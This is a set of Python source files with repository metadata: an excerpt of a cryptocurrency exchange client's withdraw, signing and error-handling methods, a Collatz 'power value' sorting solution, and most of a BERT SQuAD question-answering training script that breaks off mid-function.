def withdraw(self, code, amount, address, tag=None, params={}):
self.load_markets()
self.check_address(address)
currency = self.currency(code)
request = {
'address': address, # only supports existing addresses in your withdraw address list
'amount': amount,
'currency': currency['id'].lower(),
}
if tag is not None:
request['addr-tag'] = tag # only for XRP?
response = self.privatePostDwWithdrawApiCreate(self.extend(request, params))
id = self.safe_string(response, 'data')
return {
'info': response,
'id': id,
}
    def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
        """Build the signed request for an API call.

        Public/market endpoints are plain requests; private endpoints
        (SignatureVersion 2) are signed with HMAC-SHA256 over
        '<METHOD>\\n<host>\\n<path>\\n<sorted query>' and the base64 signature
        is appended to the query string.

        :returns dict: {'url', 'method', 'body', 'headers'} for the transport layer
        """
        url = '/'
        if api == 'market':
            url += api
        elif (api == 'public') or (api == 'private'):
            url += self.version
        elif (api == 'v2Public') or (api == 'v2Private'):
            url += 'v2'
        url += '/' + self.implode_params(path, params)
        query = self.omit(params, self.extract_params(path))
        if api == 'private' or api == 'v2Private':
            self.check_required_credentials()
            timestamp = self.ymdhms(self.milliseconds(), 'T')
            request = {
                'SignatureMethod': 'HmacSHA256',
                'SignatureVersion': '2',
                'AccessKeyId': self.apiKey,
                'Timestamp': timestamp,
            }
            if method != 'POST':
                # for GET requests the query params are part of the signed string
                request = self.extend(request, query)
            # the exchange requires the signed params in sorted key order
            request = self.keysort(request)
            auth = self.urlencode(request)
            # unfortunately, PHP demands double quotes for the escaped newline symbol
            # eslint-disable-next-line quotes
            payload = "\n".join([method, self.hostname, url, auth])
            signature = self.hmac(self.encode(payload), self.encode(self.secret), hashlib.sha256, 'base64')
            auth += '&' + self.urlencode({'Signature': signature})
            url += '?' + auth
            if method == 'POST':
                # POST payloads travel as a JSON body, unsigned
                body = self.json(query)
                headers = {
                    'Content-Type': 'application/json',
                }
            else:
                headers = {
                    'Content-Type': 'application/x-www-form-urlencoded',
                }
        else:
            if params:
                url += '?' + self.urlencode(params)
        url = self.implode_params(self.urls['api'][api], {
            'hostname': self.hostname,
        }) + url
        return {'url': url, 'method': method, 'body': body, 'headers': headers}
    def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):
        """Map an error payload in a decoded API response to a typed exception.

        Falls through (returns None) when the response could not be decoded
        or does not report an error status, letting the default handler run.
        """
        if response is None:
            return  # fallback to default error handler
        if 'status' in response:
            #
            # {"status":"error","err-code":"order-limitorder-amount-min-error","err-msg":"limit order amount error, min: `0.001`","data":null}
            #
            status = self.safe_string(response, 'status')
            if status == 'error':
                code = self.safe_string(response, 'err-code')
                feedback = self.id + ' ' + body
                # try to match the machine-readable code first, then the
                # human-readable message; raise a generic error otherwise
                self.throw_exactly_matched_exception(self.exceptions['exact'], code, feedback)
                message = self.safe_string(response, 'err-msg')
                self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
                raise ExchangeError(feedback)
| 43.712751 | 355 | 0.48267 |
6d32a836d65abd1ee5d2fe4347e09f02459c9feb | 2,097 | py | Python | ALGO/05_Graph/SortIntByPowerValue.py | dushyantbhatt2007/DS-AND-ALGO | 2d4639cab8ae5fc87ce93f23d2d557652f729d93 | [
"MIT"
] | 1 | 2021-01-03T23:06:41.000Z | 2021-01-03T23:06:41.000Z | ALGO/05_Graph/SortIntByPowerValue.py | dushyantbhatt2007/data-structure-and-algo | 2d4639cab8ae5fc87ce93f23d2d557652f729d93 | [
"MIT"
] | null | null | null | ALGO/05_Graph/SortIntByPowerValue.py | dushyantbhatt2007/data-structure-and-algo | 2d4639cab8ae5fc87ce93f23d2d557652f729d93 | [
"MIT"
] | null | null | null | '''
The power of an integer x is defined as the number of steps needed to transform x into 1 using the following steps:
if x is even then x = x / 2
if x is odd then x = 3 * x + 1
For example, the power of x = 3 is 7 because 3 needs 7 steps to become 1 (3 --> 10 --> 5 --> 16 --> 8 --> 4 --> 2 --> 1).
Given three integers lo, hi and k. The task is to sort all integers in the interval [lo, hi] by the power value in ascending order, if two or more integers have the same power value sort them by ascending order.
Return the k-th integer in the range [lo, hi] sorted by the power value.
Notice that for any integer x (lo <= x <= hi) it is guaranteed that x will transform into 1 using these steps and that the power of x will fit in a 32-bit signed integer.
Example 1:
Input: lo = 12, hi = 15, k = 2
Output: 13
Explanation: The power of 12 is 9 (12 --> 6 --> 3 --> 10 --> 5 --> 16 --> 8 --> 4 --> 2 --> 1)
The power of 13 is 9
The power of 14 is 17
The power of 15 is 17
The interval sorted by the power value [12,13,14,15]. For k = 2 answer is the second element which is 13.
Notice that 12 and 13 have the same power value and we sorted them in ascending order. Same for 14 and 15.
Example 2:
Input: lo = 1, hi = 1, k = 1
Output: 1
Example 3:
Input: lo = 7, hi = 11, k = 4
Output: 7
Explanation: The power array corresponding to the interval [7, 8, 9, 10, 11] is [16, 3, 19, 6, 14].
The interval sorted by power is [8, 10, 11, 7, 9].
The fourth number in the sorted array is 7.
Example 4:
Input: lo = 10, hi = 20, k = 5
Output: 13
Example 5:
Input: lo = 1, hi = 1000, k = 777
Output: 570
Constraints:
1 <= lo <= hi <= 1000
1 <= k <= hi - lo + 1
'''
class Solution:
    def getKth(self, lo: int, hi: int, k: int) -> int:
        """Return the k-th integer in [lo, hi] when sorted by Collatz power.

        The power of x is the number of Collatz steps (x -> x/2 if even,
        x -> 3x+1 if odd) needed to reach 1. Ties in power are broken by
        ascending integer value, per the problem statement.

        Fixes over the original: uses integer division (`// 2`) instead of
        float division, and memoizes the step count so shared suffixes of
        Collatz chains are computed once instead of exponentially often.
        """
        from functools import lru_cache

        @lru_cache(maxsize=None)
        def power(x: int) -> int:
            # Number of Collatz steps from x down to 1.
            if x == 1:
                return 0
            return 1 + (power(3 * x + 1) if x % 2 == 1 else power(x // 2))

        # Sort by (power, value): stable ascending tie-break is explicit.
        return sorted(range(lo, hi + 1), key=lambda x: (power(x), x))[k - 1]
if __name__ == "__main__":
    # Manual smoke check: example 4 from the docstring, expected output 13.
    solution = Solution()
    print(solution.getKth(10, 20, 5))
| 26.544304 | 211 | 0.622794 |
527e0537f679f0ee56082913dd5a60d43513d58e | 47,951 | py | Python | language/bert_extraction/steal_bert_qa/models/run_squad.py | Xtuden-com/language | 70c0328968d5ffa1201c6fdecde45bbc4fec19fc | [
"Apache-2.0"
] | 1,199 | 2018-10-16T01:30:18.000Z | 2022-03-31T21:05:24.000Z | language/bert_extraction/steal_bert_qa/models/run_squad.py | Xtuden-com/language | 70c0328968d5ffa1201c6fdecde45bbc4fec19fc | [
"Apache-2.0"
] | 116 | 2018-10-18T03:31:46.000Z | 2022-03-24T13:40:50.000Z | language/bert_extraction/steal_bert_qa/models/run_squad.py | Xtuden-com/language | 70c0328968d5ffa1201c6fdecde45bbc4fec19fc | [
"Apache-2.0"
] | 303 | 2018-10-22T12:35:12.000Z | 2022-03-27T17:38:17.000Z | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run BERT on SQuAD 1.1 and SQuAD 2.0."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import math
import os
import random
from bert import modeling
from bert import optimization
from bert import tokenization
import six
from six.moves import range
import tensorflow.compat.v1 as tf
from tensorflow.contrib import cluster_resolver as contrib_cluster_resolver
from tensorflow.contrib import data as contrib_data
from tensorflow.contrib import tpu as contrib_tpu
flags = tf.flags
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string(
    "bert_config_file", None,
    "The config json file corresponding to the pre-trained BERT model. "
    "This specifies the model architecture.")
flags.DEFINE_string("vocab_file", None,
                    "The vocabulary file that the BERT model was trained on.")
flags.DEFINE_string(
    "output_dir", None,
    "The output directory where the model checkpoints will be written.")
## Other parameters
flags.DEFINE_string("train_file", None,
                    "SQuAD json for training. E.g., train-v1.1.json")
## Extraction-experiment parameters
flags.DEFINE_string("exp_name", "default_experiment",
                    "Unique experiment name to prevent file collisions")
flags.DEFINE_string(
    "predict_input_file", None,
    "SQuAD json for predictions. E.g., dev-v1.1.json or test-v1.1.json")
flags.DEFINE_string("predict_output_dir", None,
                    "Output directory for prediction outputs.")
flags.DEFINE_string(
    "init_checkpoint", None,
    "Initial checkpoint (usually from a pre-trained BERT model).")
flags.DEFINE_bool(
    "do_lower_case", True,
    "Whether to lower case the input text. Should be True for uncased "
    "models and False for cased models.")
flags.DEFINE_integer(
    "max_seq_length", 384,
    "The maximum total input sequence length after WordPiece tokenization. "
    "Sequences longer than this will be truncated, and sequences shorter "
    "than this will be padded.")
flags.DEFINE_integer(
    "doc_stride", 128,
    "When splitting up a long document into chunks, how much stride to "
    "take between chunks.")
flags.DEFINE_integer(
    "max_query_length", 64,
    "The maximum number of tokens for the question. Questions longer than "
    "this will be truncated to this length.")
flags.DEFINE_bool("do_train", False, "Whether to run training.")
flags.DEFINE_bool("do_predict", False, "Whether to run eval on the dev set.")
flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")
flags.DEFINE_integer("predict_batch_size", 8,
                     "Total batch size for predictions.")
flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.")
flags.DEFINE_float("num_train_epochs", 3.0,
                   "Total number of training epochs to perform.")
flags.DEFINE_float(
    "warmup_proportion", 0.1,
    "Proportion of training to perform linear learning rate warmup for. "
    "E.g., 0.1 = 10% of training.")
flags.DEFINE_integer("save_checkpoints_steps", 5000,
                     "How often to save the model checkpoint.")
flags.DEFINE_integer("iterations_per_loop", 1000,
                     "How many steps to make in each estimator call.")
flags.DEFINE_integer(
    "n_best_size", 20,
    "The total number of n-best predictions to generate in the "
    "nbest_predictions.json output file.")
flags.DEFINE_integer(
    "max_answer_length", 30,
    "The maximum length of an answer that can be generated. This is needed "
    "because the start and end predictions are not conditioned on one another.")
## TPU / hardware parameters
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")
tf.flags.DEFINE_string(
    "tpu_name", None,
    "The Cloud TPU to use for training. This should be either the name "
    "used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
    "url.")
tf.flags.DEFINE_string(
    "tpu_zone", None,
    "[Optional] GCE zone where the Cloud TPU is located in. If not "
    "specified, we will attempt to automatically detect the GCE project from "
    "metadata.")
tf.flags.DEFINE_string(
    "gcp_project", None,
    "[Optional] Project name for the Cloud TPU-enabled project. If not "
    "specified, we will attempt to automatically detect the GCE project from "
    "metadata.")
tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")
flags.DEFINE_integer(
    "num_tpu_cores", 8,
    "Only used if `use_tpu` is True. Total number of TPU cores to use.")
flags.DEFINE_bool(
    "verbose_logging", False,
    "If true, all of the warnings related to data processing will be printed. "
    "A number of warnings are expected for a normal SQuAD evaluation.")
## SQuAD 2.0 (unanswerable questions) parameters
flags.DEFINE_bool(
    "version_2_with_negative", False,
    "If true, the SQuAD examples contain some that do not have an answer.")
flags.DEFINE_float(
    "null_score_diff_threshold", 0.0,
    "If null_score - best_non_null is greater than the threshold predict null.")
class SquadExample(object):
  """A single training/test example for simple sequence classification.

     For examples without an answer, the start and end position are -1.

  Attributes:
    qas_id: unique question id from the SQuAD json.
    question_text: raw question string.
    doc_tokens: whitespace-tokenized context paragraph.
    orig_answer_text: original answer string (None/"" when unavailable).
    start_position: answer start index into doc_tokens (None at predict time).
    end_position: answer end index into doc_tokens (None at predict time).
    is_impossible: SQuAD 2.0 flag for unanswerable questions.
  """

  def __init__(self,
               qas_id,
               question_text,
               doc_tokens,
               orig_answer_text=None,
               start_position=None,
               end_position=None,
               is_impossible=False):
    self.qas_id = qas_id
    self.question_text = question_text
    self.doc_tokens = doc_tokens
    self.orig_answer_text = orig_answer_text
    self.start_position = start_position
    self.end_position = end_position
    self.is_impossible = is_impossible

  def __str__(self):
    return self.__repr__()

  def __repr__(self):
    s = ""
    s += "qas_id: %s" % (tokenization.printable_text(self.qas_id))
    s += ", question_text: %s" % (
        tokenization.printable_text(self.question_text))
    s += ", doc_tokens: [%s]" % (" ".join(self.doc_tokens))
    # Bug fix: the three fields below used to be gated on the *truthiness* of
    # start_position, so a legitimate start_position of 0 silently dropped
    # the span fields from the repr. Gate on `is not None` instead.
    if self.start_position is not None:
      s += ", start_position: %d" % (self.start_position)
      s += ", end_position: %d" % (self.end_position)
      s += ", is_impossible: %r" % (self.is_impossible)
    return s
class InputFeatures(object):
  """A single set of features of data.

  One InputFeatures corresponds to one document span ("doc span") of a
  SquadExample; long documents yield several of these per example.

  Attributes:
    unique_id: globally unique id for this feature (used to join with
      model outputs at prediction time).
    example_index: index of the originating SquadExample.
    doc_span_index: index of this span within the example's doc spans.
    tokens: full WordPiece token sequence ([CLS] query [SEP] doc [SEP]).
    token_to_orig_map: maps a token index to its whitespace-token index
      in the original document.
    token_is_max_context: maps a token index to whether this span gives
      the token its maximal context (see _check_is_max_context).
    input_ids: token ids, zero-padded to max_seq_length.
    input_mask: 1 for real tokens, 0 for padding.
    segment_ids: 0 for query tokens, 1 for document tokens.
    start_position: answer start token index (training only).
    end_position: answer end token index (training only).
    is_impossible: SQuAD 2.0 unanswerable flag (training only).
  """

  def __init__(self,
               unique_id,
               example_index,
               doc_span_index,
               tokens,
               token_to_orig_map,
               token_is_max_context,
               input_ids,
               input_mask,
               segment_ids,
               start_position=None,
               end_position=None,
               is_impossible=None):
    self.unique_id = unique_id
    self.example_index = example_index
    self.doc_span_index = doc_span_index
    self.tokens = tokens
    self.token_to_orig_map = token_to_orig_map
    self.token_is_max_context = token_is_max_context
    self.input_ids = input_ids
    self.input_mask = input_mask
    self.segment_ids = segment_ids
    self.start_position = start_position
    self.end_position = end_position
    self.is_impossible = is_impossible
def read_squad_examples(input_file, is_training):
  """Read a SQuAD json file into a list of SquadExample.

  Args:
    input_file: path to a SQuAD-format json file (v1.1 or v2.0 layout).
    is_training: bool. When True, answer spans are extracted and validated;
      examples whose answer text cannot be recovered from the document
      are skipped with a warning.

  Returns:
    A list of `SquadExample`, one per question.
  """
  with tf.gfile.Open(input_file, "r") as reader:
    input_data = json.load(reader)["data"]
  def is_whitespace(c):
    # 0x202F is NARROW NO-BREAK SPACE, which appears in some contexts.
    if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
      return True
    return False
  examples = []
  for entry in input_data:
    for paragraph in entry["paragraphs"]:
      paragraph_text = paragraph["context"]
      doc_tokens = []
      char_to_word_offset = []
      prev_is_whitespace = True
      # Whitespace-tokenize the context while recording, for every
      # character, the index of the token it belongs to. This lets us map
      # the json's character-based answer offsets to token indices below.
      for c in paragraph_text:
        if is_whitespace(c):
          prev_is_whitespace = True
        else:
          if prev_is_whitespace:
            doc_tokens.append(c)
          else:
            doc_tokens[-1] += c
          prev_is_whitespace = False
        char_to_word_offset.append(len(doc_tokens) - 1)
      for qa in paragraph["qas"]:
        qas_id = qa["id"]
        question_text = qa["question"]
        start_position = None
        end_position = None
        orig_answer_text = None
        is_impossible = False
        if is_training:
          if FLAGS.version_2_with_negative:
            is_impossible = qa["is_impossible"]
          if (len(qa["answers"]) != 1) and (not is_impossible):
            raise ValueError(
                "For training, each question should have exactly 1 answer.")
          if not is_impossible:
            answer = qa["answers"][0]
            orig_answer_text = answer["text"]
            answer_offset = answer["answer_start"]
            answer_length = len(orig_answer_text)
            start_position = char_to_word_offset[answer_offset]
            end_position = char_to_word_offset[answer_offset + answer_length -
                                               1]
            # Only add answers where the text can be exactly recovered from the
            # document. If this CAN'T happen it's likely due to weird Unicode
            # stuff so we will just skip the example.
            #
            # Note that this means for training mode, every example is NOT
            # guaranteed to be preserved.
            actual_text = " ".join(doc_tokens[start_position:(end_position +
                                                              1)])
            cleaned_answer_text = " ".join(
                tokenization.whitespace_tokenize(orig_answer_text))
            if actual_text.find(cleaned_answer_text) == -1:
              tf.logging.warning("Could not find answer: '%s' vs. '%s'",
                                 actual_text, cleaned_answer_text)
              continue
          else:
            start_position = -1
            end_position = -1
            orig_answer_text = ""
        example = SquadExample(
            qas_id=qas_id,
            question_text=question_text,
            doc_tokens=doc_tokens,
            orig_answer_text=orig_answer_text,
            start_position=start_position,
            end_position=end_position,
            is_impossible=is_impossible)
        examples.append(example)
  return examples
def convert_examples_to_features(examples, tokenizer, max_seq_length,
                                 doc_stride, max_query_length, is_training,
                                 output_fn):
  """Loads a data file into a list of `InputBatch`s.

  WordPiece-tokenizes each example, splits long documents into overlapping
  doc spans (sliding window of `doc_stride`), and calls `output_fn(feature)`
  for every resulting `InputFeatures` instead of returning a list.

  Args:
    examples: list of `SquadExample` from read_squad_examples.
    tokenizer: a tokenizer exposing `tokenize` and `convert_tokens_to_ids`.
    max_seq_length: total length of [CLS] query [SEP] doc [SEP] after padding.
    doc_stride: stride between consecutive doc spans for long documents.
    max_query_length: questions longer than this are truncated.
    is_training: when True, answer positions are mapped into each span.
    output_fn: callback receiving each finished `InputFeatures`.
  """
  unique_id = 1000000000
  for (example_index, example) in enumerate(examples):
    query_tokens = tokenizer.tokenize(example.question_text)
    if len(query_tokens) > max_query_length:
      query_tokens = query_tokens[0:max_query_length]
    # Build the mapping between whitespace tokens and WordPiece sub-tokens
    # in both directions, so answer positions can be translated.
    tok_to_orig_index = []
    orig_to_tok_index = []
    all_doc_tokens = []
    for (i, token) in enumerate(example.doc_tokens):
      orig_to_tok_index.append(len(all_doc_tokens))
      sub_tokens = tokenizer.tokenize(token)
      for sub_token in sub_tokens:
        tok_to_orig_index.append(i)
        all_doc_tokens.append(sub_token)
    tok_start_position = None
    tok_end_position = None
    if is_training and example.is_impossible:
      tok_start_position = -1
      tok_end_position = -1
    if is_training and not example.is_impossible:
      tok_start_position = orig_to_tok_index[example.start_position]
      if example.end_position < len(example.doc_tokens) - 1:
        tok_end_position = orig_to_tok_index[example.end_position + 1] - 1
      else:
        tok_end_position = len(all_doc_tokens) - 1
      (tok_start_position, tok_end_position) = _improve_answer_span(
          all_doc_tokens, tok_start_position, tok_end_position, tokenizer,
          example.orig_answer_text)
    # The -3 accounts for [CLS], [SEP] and [SEP]
    max_tokens_for_doc = max_seq_length - len(query_tokens) - 3
    # We can have documents that are longer than the maximum sequence length.
    # To deal with this we do a sliding window approach, where we take chunks
    # of the up to our max length with a stride of `doc_stride`.
    _DocSpan = collections.namedtuple(  # pylint: disable=invalid-name
        "DocSpan", ["start", "length"])
    doc_spans = []
    start_offset = 0
    while start_offset < len(all_doc_tokens):
      length = len(all_doc_tokens) - start_offset
      if length > max_tokens_for_doc:
        length = max_tokens_for_doc
      doc_spans.append(_DocSpan(start=start_offset, length=length))
      if start_offset + length == len(all_doc_tokens):
        break
      start_offset += min(length, doc_stride)
    for (doc_span_index, doc_span) in enumerate(doc_spans):
      tokens = []
      token_to_orig_map = {}
      token_is_max_context = {}
      segment_ids = []
      # Layout: [CLS] query tokens [SEP] (segment 0), doc tokens [SEP]
      # (segment 1).
      tokens.append("[CLS]")
      segment_ids.append(0)
      for token in query_tokens:
        tokens.append(token)
        segment_ids.append(0)
      tokens.append("[SEP]")
      segment_ids.append(0)
      for i in range(doc_span.length):
        split_token_index = doc_span.start + i
        token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]
        is_max_context = _check_is_max_context(doc_spans, doc_span_index,
                                               split_token_index)
        token_is_max_context[len(tokens)] = is_max_context
        tokens.append(all_doc_tokens[split_token_index])
        segment_ids.append(1)
      tokens.append("[SEP]")
      segment_ids.append(1)
      input_ids = tokenizer.convert_tokens_to_ids(tokens)
      # The mask has 1 for real tokens and 0 for padding tokens. Only real
      # tokens are attended to.
      input_mask = [1] * len(input_ids)
      # Zero-pad up to the sequence length.
      while len(input_ids) < max_seq_length:
        input_ids.append(0)
        input_mask.append(0)
        segment_ids.append(0)
      assert len(input_ids) == max_seq_length
      assert len(input_mask) == max_seq_length
      assert len(segment_ids) == max_seq_length
      start_position = None
      end_position = None
      if is_training and not example.is_impossible:
        # For training, if our document chunk does not contain an annotation
        # we throw it out, since there is nothing to predict.
        doc_start = doc_span.start
        doc_end = doc_span.start + doc_span.length - 1
        out_of_span = False
        if not (tok_start_position >= doc_start and
                tok_end_position <= doc_end):
          out_of_span = True
        if out_of_span:
          start_position = 0
          end_position = 0
        else:
          doc_offset = len(query_tokens) + 2
          start_position = tok_start_position - doc_start + doc_offset
          end_position = tok_end_position - doc_start + doc_offset
      if is_training and example.is_impossible:
        # Impossible questions point at the [CLS] token (position 0).
        start_position = 0
        end_position = 0
      if example_index < 20:
        tf.logging.info("*** Example ***")
        tf.logging.info("unique_id: %s" % (unique_id))
        tf.logging.info("example_index: %s" % (example_index))
        tf.logging.info("doc_span_index: %s" % (doc_span_index))
        tf.logging.info(
            "tokens: %s" %
            " ".join([tokenization.printable_text(x) for x in tokens]))
        tf.logging.info("token_to_orig_map: %s" % " ".join(
            ["%d:%d" % (x, y) for (x, y) in six.iteritems(token_to_orig_map)]))
        tf.logging.info("token_is_max_context: %s" % " ".join([
            "%d:%s" % (x, y) for (x, y) in six.iteritems(token_is_max_context)
        ]))
        tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
        tf.logging.info("input_mask: %s" %
                        " ".join([str(x) for x in input_mask]))
        tf.logging.info("segment_ids: %s" %
                        " ".join([str(x) for x in segment_ids]))
        if is_training and example.is_impossible:
          tf.logging.info("impossible example")
        if is_training and not example.is_impossible:
          answer_text = " ".join(tokens[start_position:(end_position + 1)])
          tf.logging.info("start_position: %d" % (start_position))
          tf.logging.info("end_position: %d" % (end_position))
          tf.logging.info("answer: %s" %
                          (tokenization.printable_text(answer_text)))
      feature = InputFeatures(
          unique_id=unique_id,
          example_index=example_index,
          doc_span_index=doc_span_index,
          tokens=tokens,
          token_to_orig_map=token_to_orig_map,
          token_is_max_context=token_is_max_context,
          input_ids=input_ids,
          input_mask=input_mask,
          segment_ids=segment_ids,
          start_position=start_position,
          end_position=end_position,
          is_impossible=example.is_impossible)
      # Run callback
      output_fn(feature)
      unique_id += 1
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,
orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer."""
# The SQuAD annotations are character based. We first project them to
# whitespace-tokenized words. But then after WordPiece tokenization, we can
# often find a "better match". For example:
#
# Question: What year was John Smith born?
# Context: The leader was John Smith (1895-1943).
# Answer: 1895
#
# The original whitespace-tokenized answer will be "(1895-1943).". However
# after tokenization, our tokens will be "( 1895 - 1943 ) .". So we can match
# the exact answer, 1895.
#
# However, this is not always possible. Consider the following:
#
# Question: What country is the top exporter of electornics?
# Context: The Japanese electronics industry is the lagest in the world.
# Answer: Japan
#
# In this case, the annotator chose "Japan" as a character sub-span of
# the word "Japanese". Since our WordPiece tokenizer does not split
# "Japanese", we just use "Japanese" as the annotation. This is fairly rare
# in SQuAD, but does happen.
tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text))
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = " ".join(doc_tokens[new_start:(new_end + 1)])
if text_span == tok_answer_text:
return (new_start, new_end)
return (input_start, input_end)
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token."""
# Because of the sliding window approach taken to scoring documents, a single
# token can appear in multiple documents. E.g.
# Doc: the man went to the store and bought a gallon of milk
# Span A: the man went to the
# Span B: to the store and bought
# Span C: and bought a gallon of
# ...
#
# Now the word 'bought' will have two scores from spans B and C. We only
# want to consider the score with "maximum context", which we define as
# the *minimum* of its left and right context (the *sum* of left and
# right context will always be the same, of course).
#
# In the example the maximum context for 'bought' would be span C since
# it has 1 left context and 3 right context, while span B has 4 left context
# and 0 right context.
best_score = None
best_span_index = None
for (span_index, doc_span) in enumerate(doc_spans):
end = doc_span.start + doc_span.length - 1
if position < doc_span.start:
continue
if position > end:
continue
num_left_context = position - doc_span.start
num_right_context = end - position
score = min(num_left_context, num_right_context) + 0.01 * doc_span.length
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index
def create_model(bert_config, is_training, input_ids, input_mask, segment_ids,
                 use_one_hot_embeddings):
  """Creates a classification model.

  Builds a BERT encoder plus a single linear layer over the sequence output
  that produces, for every token position, a start logit and an end logit
  for answer-span prediction.

  Args:
    bert_config: `modeling.BertConfig` describing the encoder.
    is_training: bool; enables dropout inside BERT when True.
    input_ids: int32 Tensor [batch_size, seq_length] of WordPiece ids.
    input_mask: int32 Tensor [batch_size, seq_length]; 1 for real tokens.
    segment_ids: int32 Tensor [batch_size, seq_length]; 0 = question,
      1 = document (see convert_examples_to_features).
    use_one_hot_embeddings: bool; one-hot embedding lookup (TPU-friendly).

  Returns:
    A (start_logits, end_logits) pair of float Tensors, each of shape
    [batch_size, seq_length].
  """
  model = modeling.BertModel(
      config=bert_config,
      is_training=is_training,
      input_ids=input_ids,
      input_mask=input_mask,
      token_type_ids=segment_ids,
      use_one_hot_embeddings=use_one_hot_embeddings)
  final_hidden = model.get_sequence_output()
  final_hidden_shape = modeling.get_shape_list(final_hidden, expected_rank=3)
  batch_size = final_hidden_shape[0]
  seq_length = final_hidden_shape[1]
  hidden_size = final_hidden_shape[2]
  # A single dense layer mapping hidden states to 2 outputs per position
  # (start logit, end logit).
  output_weights = tf.get_variable(
      "cls/squad/output_weights", [2, hidden_size],
      initializer=tf.truncated_normal_initializer(stddev=0.02))
  output_bias = tf.get_variable(
      "cls/squad/output_bias", [2], initializer=tf.zeros_initializer())
  final_hidden_matrix = tf.reshape(final_hidden,
                                   [batch_size * seq_length, hidden_size])
  logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True)
  logits = tf.nn.bias_add(logits, output_bias)
  # [batch, seq, 2] -> [2, batch, seq], then unstack into the two heads.
  logits = tf.reshape(logits, [batch_size, seq_length, 2])
  logits = tf.transpose(logits, [2, 0, 1])
  unstacked_logits = tf.unstack(logits, axis=0)
  (start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1])
  return (start_logits, end_logits)
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
                     num_train_steps, num_warmup_steps, use_tpu,
                     use_one_hot_embeddings):
  """Returns `model_fn` closure for TPUEstimator.

  The closure supports TRAIN (cross-entropy over gold start/end positions,
  averaged) and PREDICT (raw start/end logits keyed by unique_ids) modes;
  EVAL is not implemented and raises ValueError.
  """
  def model_fn(features, labels, mode, params):  # pylint: disable=unused-argument
    """The `model_fn` for TPUEstimator."""
    tf.logging.info("*** Features ***")
    for name in sorted(features.keys()):
      tf.logging.info("  name = %s, shape = %s" % (name, features[name].shape))
    unique_ids = features["unique_ids"]
    input_ids = features["input_ids"]
    input_mask = features["input_mask"]
    segment_ids = features["segment_ids"]
    is_training = (mode == tf.estimator.ModeKeys.TRAIN)
    (start_logits, end_logits) = create_model(
        bert_config=bert_config,
        is_training=is_training,
        input_ids=input_ids,
        input_mask=input_mask,
        segment_ids=segment_ids,
        use_one_hot_embeddings=use_one_hot_embeddings)
    tvars = tf.trainable_variables()
    initialized_variable_names = {}
    scaffold_fn = None
    # Warm-start the encoder from a pre-trained BERT checkpoint. On TPU the
    # initialization has to happen inside a Scaffold.
    if init_checkpoint:
      (assignment_map, initialized_variable_names
      ) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
      if use_tpu:
        def tpu_scaffold():
          tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
          return tf.train.Scaffold()
        scaffold_fn = tpu_scaffold
      else:
        tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
    tf.logging.info("**** Trainable Variables ****")
    for var in tvars:
      init_string = ""
      if var.name in initialized_variable_names:
        init_string = ", *INIT_FROM_CKPT*"
      tf.logging.info("  name = %s, shape = %s%s", var.name, var.shape,
                      init_string)
    output_spec = None
    if mode == tf.estimator.ModeKeys.TRAIN:
      seq_length = modeling.get_shape_list(input_ids)[1]
      def compute_loss(logits, positions):
        # Cross-entropy of the position distribution against the gold index.
        one_hot_positions = tf.one_hot(
            positions, depth=seq_length, dtype=tf.float32)
        log_probs = tf.nn.log_softmax(logits, axis=-1)
        loss = -tf.reduce_mean(
            tf.reduce_sum(one_hot_positions * log_probs, axis=-1))
        return loss
      start_positions = features["start_positions"]
      end_positions = features["end_positions"]
      start_loss = compute_loss(start_logits, start_positions)
      end_loss = compute_loss(end_logits, end_positions)
      # Average the two independent span-endpoint losses.
      total_loss = (start_loss + end_loss) / 2.0
      train_op = optimization.create_optimizer(total_loss, learning_rate,
                                               num_train_steps,
                                               num_warmup_steps, use_tpu)
      output_spec = contrib_tpu.TPUEstimatorSpec(
          mode=mode,
          loss=total_loss,
          train_op=train_op,
          scaffold_fn=scaffold_fn)
    elif mode == tf.estimator.ModeKeys.PREDICT:
      predictions = {
          "unique_ids": unique_ids,
          "start_logits": start_logits,
          "end_logits": end_logits,
      }
      output_spec = contrib_tpu.TPUEstimatorSpec(
          mode=mode, predictions=predictions, scaffold_fn=scaffold_fn)
    else:
      raise ValueError("Only TRAIN and PREDICT modes are supported: %s" %
                       (mode))
    return output_spec
  return model_fn
def input_fn_builder(input_file, seq_length, is_training, drop_remainder):
  """Creates an `input_fn` closure to be passed to TPUEstimator.

  Reads TFRecords of serialized tf.Examples (as produced by
  convert_examples_to_features) and yields batched int32 features. Training
  mode repeats and shuffles; start/end positions are only parsed in
  training mode.
  """
  name_to_features = {
      "unique_ids": tf.FixedLenFeature([], tf.int64),
      "input_ids": tf.FixedLenFeature([seq_length], tf.int64),
